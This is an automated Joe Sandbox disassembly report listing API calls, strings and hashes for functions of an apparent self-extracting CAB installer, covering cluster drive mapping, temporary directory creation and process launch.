                                                              • Instruction ID: 92e87259cb153254ddc4836bbfcaf51fc824f465c10ee7110bf50ac64baa86e8
                                                              • Opcode Fuzzy Hash: 41ec4ed5a8e7d4de42864dd20fe9819641c602b06b7b82448c64306cea2c2ccf
                                                              • Instruction Fuzzy Hash: AD429F70910269EFCB10CFA8C584ADDBBF4BF59304F248189E449AB352C776AE65CF60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw
                                                              • String ID:
                                                              • API String ID: 3670251406-0
                                                              • Opcode ID: 08ee24109f51696dd593a6c0a6ba157f34e81e9dda13edde7116eeeeaccf2a76
                                                              • Instruction ID: f10b90cf59a558baface90d3f6e3aba71c30bb558db88e3fafeff811bea0215f
                                                              • Opcode Fuzzy Hash: 08ee24109f51696dd593a6c0a6ba157f34e81e9dda13edde7116eeeeaccf2a76
                                                              • Instruction Fuzzy Hash: FF423C71D10269EFCF10DFD4D880ADDBBB5BF18314F15819AE849AB252C770AAA5CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetSystemInfo.KERNELBASE(?), ref: 0021CACB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem
                                                              • String ID:
                                                              • API String ID: 31276548-0
                                                              • Opcode ID: e6a098d19377bd7d266d4d6ac02050793448787a9e3324b22f0b3e86d067dcf7
                                                              • Instruction ID: 3a7dd22d4898b553155ab4e34cfc5fe314c4f6976b06e4cb549b203f049c59ee
                                                              • Opcode Fuzzy Hash: e6a098d19377bd7d266d4d6ac02050793448787a9e3324b22f0b3e86d067dcf7
                                                              • Instruction Fuzzy Hash: 1AF0B7B5900B458BC320DF6AC4446DBFBF8BF98304F10481FD8BA93210D7B0A5898F50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d7ca036dae94d16dd847209190d22f1c3a812ec600e542fc6764ba29da7bc41
                                                              • Instruction ID: 7de958ec41aa2e3604f22314a3e00429e408094b2b6b3c904f2e6d900b587b9f
                                                              • Opcode Fuzzy Hash: 0d7ca036dae94d16dd847209190d22f1c3a812ec600e542fc6764ba29da7bc41
                                                              • Instruction Fuzzy Hash: 5CE1CD70524361EFC710CF68D440A5ABBE1BF88324F158A99F8999B352C379EE95CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              [Control-flow graph not reproduced; its nodes reference SetEnvironmentVariableW, GetLastError, CreateProcessW, GetTopWindow, GetWindowThreadProcessId, GetWindow, Sleep, WaitForSingleObject, GetExitCodeProcess and CloseHandle]
                                                              APIs
                                                              • _memset.LIBCMT ref: 00215E2A
                                                                • Part of subcall function 002195C3: GetCurrentDirectoryW.KERNEL32(00000040,00000000,00000000,00000000,0023BEF0,?,?,00216F89,0023BEF8,00000000,0023BEF0,?,?,?,00216F09,?), ref: 002195E8
                                                                • Part of subcall function 002195C3: GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,00216F89,0023BEF8,00000000,0023BEF0,?,?,?,00216F09,?,?,00000000), ref: 00219607
                                                                • Part of subcall function 002195C3: GetLastError.KERNEL32(?,?,00216F89,0023BEF8,00000000,0023BEF0,?,?,?,00216F09,?,?,00000000,?,?,00215B53), ref: 0021960D
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 0021604C
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00216058
                                                              • CloseHandle.KERNEL32(00215BB4,?,?,?,?,?,?), ref: 00216067
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0021606C
                                                              Strings
                                                              • Failed to set __COMPAT_LAYER, xrefs: 00215F77
                                                              • Unable to resolve the path of the exe, xrefs: 00215F93
                                                              • Failed to get the name of the module, xrefs: 00215E7D
                                                              • __COMPAT_LAYER, xrefs: 00215F4B
                                                              • _SFX_CAB_EXE_PARAMETERS, xrefs: 00215F08
                                                              • _SFX_CAB_EXE_PACKAGE, xrefs: 00215ECC
                                                              • 2, xrefs: 00216027
                                                              • _SFX_CAB_EXE_PATH, xrefs: 00215E93
                                                              • Failed to set target directory, xrefs: 00215E65
                                                              • Failed to get current directory, xrefs: 00215E4A
                                                              • Failed to stop reporting progress, xrefs: 00216038
                                                              • Failed to set _SFX_CAB_EXE_PACKAGE, xrefs: 00215EF8
                                                              • Failed to set _SFX_CAB_EXE_PATH, xrefs: 00215EBF
                                                              • Failed to start the process, xrefs: 00215FE3
                                                              • Executing command line: '%S', xrefs: 00215FA2
                                                              • Failed to set _SFX_CAB_EXE_PARAMETERS, xrefs: 00215F34
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentDirectoryHandle$CodeErrorExitLastObjectProcessSingleWait_memset
                                                              • String ID: 2$Executing command line: '%S'$Failed to get current directory$Failed to get the name of the module$Failed to set _SFX_CAB_EXE_PACKAGE$Failed to set _SFX_CAB_EXE_PARAMETERS$Failed to set _SFX_CAB_EXE_PATH$Failed to set __COMPAT_LAYER$Failed to set target directory$Failed to start the process$Failed to stop reporting progress$Unable to resolve the path of the exe$_SFX_CAB_EXE_PACKAGE$_SFX_CAB_EXE_PARAMETERS$_SFX_CAB_EXE_PATH$__COMPAT_LAYER
                                                              • API String ID: 3070882113-3483177241
                                                              • Opcode ID: 680230ed7561845ec5ddb4e8c9ec8b5a43cbd1de70200e96adcb167a446ce212
                                                              • Instruction ID: 2e31dbd1774ea3c6e4881038cdea23c6357c252e9ffd5d4e9af3391937127ead
                                                              • Opcode Fuzzy Hash: 680230ed7561845ec5ddb4e8c9ec8b5a43cbd1de70200e96adcb167a446ce212
                                                              • Instruction Fuzzy Hash: C961E532C30636EFDB219FA49C09AEE7AE5AF74750F164161FE00B6190DB748DF18A90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              • Graph not reproduced; first block 0021805A. API calls labelled on its nodes: GetSystemDirectoryW, GetLastError, LoadLibraryW, GetProcAddress.
                                                              APIs
                                                                • Part of subcall function 002187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218802
                                                                • Part of subcall function 002187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218809
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 0021809F
                                                              • GetLastError.KERNEL32 ref: 002180A9
                                                              Strings
                                                              • OpenClusterResource, xrefs: 002181B7
                                                              • %s\clusapi.dll, xrefs: 00218100
                                                              • ClusterResourceControl, xrefs: 002181D9
                                                              • OpenCluster, xrefs: 0021815E
                                                              • ClusterCloseEnum, xrefs: 00218195
                                                              • Failed to get the system directory, xrefs: 002180CA
                                                              • Successfully bound to the ClusApi.dll, xrefs: 002181EA
                                                              • Failed to load clusapi.dll, xrefs: 0021814E
                                                              • ClusterOpenEnum, xrefs: 00218184
                                                              • CloseClusterResource, xrefs: 002181C8
                                                              • Failed to allocate the system directory, xrefs: 00218091
                                                              • CloseCluster, xrefs: 00218173
                                                              • Failed to allocate the path ro the clusapi.dll, xrefs: 00218114
                                                              • ClusterEnum, xrefs: 002181A6
                                                              • Failed to load all required functions from the clusapi.dll, xrefs: 00218219
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocDirectoryErrorLastProcessSystem
                                                              • String ID: %s\clusapi.dll$CloseCluster$CloseClusterResource$ClusterCloseEnum$ClusterEnum$ClusterOpenEnum$ClusterResourceControl$Failed to allocate the path ro the clusapi.dll$Failed to allocate the system directory$Failed to get the system directory$Failed to load all required functions from the clusapi.dll$Failed to load clusapi.dll$OpenCluster$OpenClusterResource$Successfully bound to the ClusApi.dll
                                                              • API String ID: 1959106193-2729475906
                                                              • Opcode ID: 475191e572e7b1e01e6ed32a4434b42322a5b32cb0fe82879e715e16bfd068fe
                                                              • Instruction ID: 874242a337a2395d13b989959bb2be2060e4b7f25cc4eac5d39578658b816def
                                                              • Opcode Fuzzy Hash: 475191e572e7b1e01e6ed32a4434b42322a5b32cb0fe82879e715e16bfd068fe
                                                              • Instruction Fuzzy Hash: B841D476E7070BAAD7126F74ADC5BE935E9AF74314F250025AE08E3181EF74C9F58A10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              • Graph not reproduced; first block 0021676F. API calls labelled on its nodes: GetModuleHandleW, InitializeCriticalSection, CreateEventA, CreateThread, GetLastError, DeleteCriticalSection, WaitForSingleObject, SendMessageA, CloseHandle.
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000002,00000000,00000000,?,?,0021635A,00000000,00000002), ref: 002167A6
                                                              • InitializeCriticalSection.KERNEL32(0023BF10,00000000,000001F4,?,?,0021635A,00000000,00000002,?,?,?,?,?,?,?,00215B83), ref: 002167C6
                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,0021635A,00000000,00000002), ref: 002167D6
                                                              • GetLastError.KERNEL32(?,?,0021635A,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 002167E5
                                                              • DeleteCriticalSection.KERNEL32(0023BF10,00000002,00000000,00000000,?,?,0021635A,00000000,00000002), ref: 002168B3
                                                              • CloseHandle.KERNEL32(00000278,00000002,00000000,00000000,?,?,0021635A,00000000,00000002), ref: 002168DE
                                                              • CloseHandle.KERNEL32(00000274,00000002,00000000,00000000,?,?,0021635A,00000000,00000002), ref: 002168EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseCriticalSection$CreateDeleteErrorEventInitializeLastModule
                                                              • String ID: Failed to create progress reporting initialization event$Failed to create the UI thread$Zc!
                                                              • API String ID: 2625854008-3934491693
                                                              • Opcode ID: a553ba3cf018e95eb570eaaf5fb19e667f0169dd7d5fb53834bb7e617dc13c7d
                                                              • Instruction ID: 07d73a8906a75fc59277c986e40b2b6356dd5355682355d6c7d690d8c3ad9c0b
                                                              • Opcode Fuzzy Hash: a553ba3cf018e95eb570eaaf5fb19e667f0169dd7d5fb53834bb7e617dc13c7d
                                                              • Instruction Fuzzy Hash: C841B170921225EFC7209F64FC4D8DE7BA8FB25760B218426F504F3160D7748AE4DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              • Graph not reproduced; first block 00216A56. API calls labelled on its nodes: GetDlgItem, PostQuitMessage, GetLastError, SendMessageW, KiUserCallbackDispatcher, SetEvent, SetWindowTextW, EndDialog, SendMessageA.
                                                              APIs
                                                              • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00216AB5
                                                              • SetWindowTextW.USER32(?,00F11558), ref: 00216AD6
                                                              • SetEvent.KERNEL32 ref: 00216AE8
                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 00216B0C
                                                                • Part of subcall function 00216BE1: EnterCriticalSection.KERNEL32(0023BF10,?,?,?,00216AF8,?), ref: 00216BF2
                                                                • Part of subcall function 00216BE1: MessageBoxW.USER32(?,00000000,00000024,0000000B), ref: 00216C28
                                                                • Part of subcall function 00216BE1: LeaveCriticalSection.KERNEL32(0023BF10,?,?,00216AF8,?), ref: 00216C3E
                                                              • PostQuitMessage.USER32(00000000), ref: 00216B15
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00216B3C
                                                              • GetLastError.KERNEL32 ref: 00216B46
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00216B7E
                                                              • GetLastError.KERNEL32 ref: 00216B88
                                                              • EndDialog.USER32(?,00000000), ref: 00216BBE
                                                              • SendMessageW.USER32(00000000,?,?,?), ref: 00216BD0
                                                              Strings
                                                              • Failed to get progress bar control., xrefs: 00216BA9
                                                              • Failed to get status static control., xrefs: 00216B67
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Message$CriticalErrorItemLastSectionSend$CallbackDialogDispatcherEnterEventLeavePostQuitTextUserWindow
                                                              • String ID: Failed to get progress bar control.$Failed to get status static control.
                                                              • API String ID: 1786187333-1184021424
                                                              • Opcode ID: 79d2dc337cc10dd040854b43ca3da3ffb83c22fd62f632ef0157951c8e860452
                                                              • Instruction ID: 67821a4d82d2d0b223a953175a0cb240fab4e5577a4acab9ec8973ad6216329d
                                                              • Opcode Fuzzy Hash: 79d2dc337cc10dd040854b43ca3da3ffb83c22fd62f632ef0157951c8e860452
                                                              • Instruction Fuzzy Hash: 3F41C332828426ABCB225F14EC0C9ED3AA5EFB0355B258121FD45F60A0DB758FF1DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              • Graph not reproduced; first block 0021A505. API calls labelled on its nodes: GetProcessHeap, RtlReAllocateHeap, RtlAllocateHeap, ReadFile, GetLastError, HeapFree, HeapAlloc.
                                                              APIs
                                                                • Part of subcall function 00219B6A: SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00219B82
                                                                • Part of subcall function 00219B6A: GetLastError.KERNEL32(?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 00219B8C
                                                              • GetProcessHeap.KERNEL32(00000008,00020000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A55A
                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,00215AF6,0023BEF0), ref: 0021A55D
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A57E
                                                              • RtlReAllocateHeap.NTDLL(00000000,?,?,00215AF6,0023BEF0), ref: 0021A581
                                                              • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000), ref: 0021A5A7
                                                              • GetProcessHeap.KERNEL32(00000008,0023BEF0,00000000,?,?,00215AF6,0023BEF0,?), ref: 0021A5E3
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0021A5E6
                                                              • GetProcessHeap.KERNEL32(00000008,8B000006), ref: 0021A5F7
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0021A5FA
                                                              • GetLastError.KERNEL32 ref: 0021A60C
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A663
                                                              • HeapFree.KERNEL32(00000000,?,?,00215AF6,0023BEF0), ref: 0021A666
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocAllocateErrorFileLast$FreePointerRead
                                                              • String ID:
                                                              • API String ID: 15841721-0
                                                              • Opcode ID: 603e9a37c7e2047214e1f472f8b10c162deab81609489541054dceeaf42132d5
                                                              • Instruction ID: 1c85943b6628f93971d6c45801dfad0b784d6be84a80c9580c8cc884e67e0f0f
                                                              • Opcode Fuzzy Hash: 603e9a37c7e2047214e1f472f8b10c162deab81609489541054dceeaf42132d5
                                                              • Instruction Fuzzy Hash: 3A4137B1D1125AFBDF019FE5C948BEEBBB8FF18340F148056E604E6250DB749AA09F91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              • Graph not reproduced; first block 00217AE7. API calls labelled on its nodes: SetErrorMode, CreateDirectoryW, RemoveDirectoryW, MoveFileExW.
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000000,00000000,?,?,?,?,?,002178B7,?,?), ref: 00217B01
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,?,002178B7,?,?,?,?,?,?,?,?,?,?,00216F09), ref: 00217B0A
                                                                • Part of subcall function 0021746A: UuidCreate.RPCRT4(?), ref: 00217496
                                                                • Part of subcall function 0021746A: RpcStringFreeW.RPCRT4(00000000), ref: 002174FF
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,002178B7,?,?), ref: 00217B60
                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,002178B7,?,?), ref: 00217B6E
                                                              • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,?,?,002178B7,?,?), ref: 00217B7C
                                                              • SetErrorMode.KERNELBASE(?,?,?,?,?,002178B7,?,?), ref: 00217BE1
                                                              Strings
                                                              • Unable to generate random directory name, xrefs: 00217BF3
                                                              • %s%s, xrefs: 00217B2B
                                                              • Unable to generate random name, xrefs: 00217BEC
                                                              • Failed to allocate long path, xrefs: 00217BFA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$CreateDirectory$FileFreeMoveRemoveStringUuid
                                                              • String ID: %s%s$Failed to allocate long path$Unable to generate random directory name$Unable to generate random name
                                                              • API String ID: 1102146613-1274944306
                                                              • Opcode ID: e1baf9d57c5ba1e808bea14ecea62acabad0645c8d3a42a339c55163cd41adad
                                                              • Instruction ID: 0bee406504460683a8a5c5f0d10d8ded5b39958faae901f3526765f97cdd99c7
                                                              • Opcode Fuzzy Hash: e1baf9d57c5ba1e808bea14ecea62acabad0645c8d3a42a339c55163cd41adad
                                                              • Instruction Fuzzy Hash: 26317071C2825AEFCF11AFE48C858DDBAF8AF65308F21447AE501B2111DB704FE19B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 002187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218802
                                                                • Part of subcall function 002187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218809
                                                              • GetLastError.KERNEL32(?,?,?,00217780,?,00000000,00000000,0023BEF0,?,?,00216F09,?,?,00000000), ref: 00217D34
                                                              • GetLastError.KERNEL32(?,?,?,00217780,?,00000000,00000000,0023BEF0,?,?,00216F09,?,?,00000000), ref: 00217D6C
                                                                • Part of subcall function 002184C7: GetLocalTime.KERNEL32(?,?,00000000), ref: 002184E2
                                                                • Part of subcall function 002184C7: swprintf.LIBCMT ref: 00218513
                                                              Strings
                                                              • Drive map for cluster resource '%S' : '%S', xrefs: 00217DEE
                                                              • Failed to initialize the Cluster API, xrefs: 00217D1F
                                                              • Failed to open the current cluster, xrefs: 00217D55
                                                              • Failed to allocate an empty drive map, xrefs: 00217D02
                                                              • Failed to open the clsuter enumeration for resources, xrefs: 00217D8D
                                                              • Failed to concatenate to the cluster drive map, xrefs: 00217E66
                                                              • Failed to get the next resource in the cluster enum, xrefs: 00217E4B
                                                              • Considering cluster resource: '%S'..., xrefs: 00217DB5
                                                              • Failed to get cluster drive map from resource, xrefs: 00217E5F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorHeapLast$AllocLocalProcessTimeswprintf
                                                              • String ID: Considering cluster resource: '%S'...$Drive map for cluster resource '%S' : '%S'$Failed to allocate an empty drive map$Failed to concatenate to the cluster drive map$Failed to get cluster drive map from resource$Failed to get the next resource in the cluster enum$Failed to initialize the Cluster API$Failed to open the clsuter enumeration for resources$Failed to open the current cluster
                                                              • API String ID: 196121278-1807027133
                                                              • Opcode ID: ef293ff5bab2d6d61cf71a1becb602b180763694e81d4f4b4bd524a0d8592bf7
                                                              • Instruction ID: 05f5c68f8e4d39d264f8ca3a20d684f05867fc3edda56f932519547e6a300487
                                                              • Opcode Fuzzy Hash: ef293ff5bab2d6d61cf71a1becb602b180763694e81d4f4b4bd524a0d8592bf7
                                                              • Instruction Fuzzy Hash: 51514D76C2411AEFCF11AFE4DC858EEBAF5AF64300F2545B9E615B2151DB310EE09B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0021B0D2
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0021B0E4
                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 0021B0F7
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 0021B100
                                                              • GetLastError.KERNEL32(?,40000000,00000001,00000002,08000080,?,00000000), ref: 0021B1DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Time$File$ChangeCloseDateErrorFindLastLocalNotification
                                                              • String ID: %s%S
                                                              • API String ID: 604158762-4203644592
                                                              • Opcode ID: 703444ce1dd9a7c5cf4c056f3097e90f90cd2c217d21214b87f229277f0826b5
                                                              • Instruction ID: f9114e7b7145e8d841da1759d0b2e9d90141a2223265a7644013761d69f502e9
                                                              • Opcode Fuzzy Hash: 703444ce1dd9a7c5cf4c056f3097e90f90cd2c217d21214b87f229277f0826b5
                                                              • Instruction Fuzzy Hash: 15516E75A20706BBDB229FA5DC84BEA77F8EF28310F108529BE19D6150DB70D9A4CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00219B6A: SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00219B82
                                                                • Part of subcall function 00219B6A: GetLastError.KERNEL32(?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 00219B8C
                                                              • ReadFile.KERNELBASE(00000000,00219ECF,00000024,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,00219ECF,?), ref: 0021AB4D
                                                              • GetLastError.KERNEL32(?,?,?,?,00219ECF,?,?,00216163,?,?,?,00000000,00000000), ref: 0021AB57
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0021AB9C
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0021ABA3
                                                              • ReadFile.KERNEL32(00000000,?,?,00000024,00000000), ref: 0021ABE1
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0021AC3B
                                                              • HeapFree.KERNEL32(00000000), ref: 0021AC42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$File$ErrorLastProcessRead$AllocFreePointer
                                                              • String ID: $
                                                              • API String ID: 1504513977-3993045852
                                                              • Opcode ID: aa9b545566376cf54026ff8938a946db14ba698f6b2f6382a7c5ba9b46fa9a25
                                                              • Instruction ID: 9b5a775ee199240d323c064753a91d8898aeb43e0cd4bcc2e7a8f8dd1f5a2d08
                                                              • Opcode Fuzzy Hash: aa9b545566376cf54026ff8938a946db14ba698f6b2f6382a7c5ba9b46fa9a25
                                                              • Instruction Fuzzy Hash: 48416D71D21219EFCF119FA9ED48AEDBBF5FF68710B10801AE911E6110C73089A0DFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00210000,00000000), ref: 0021860A
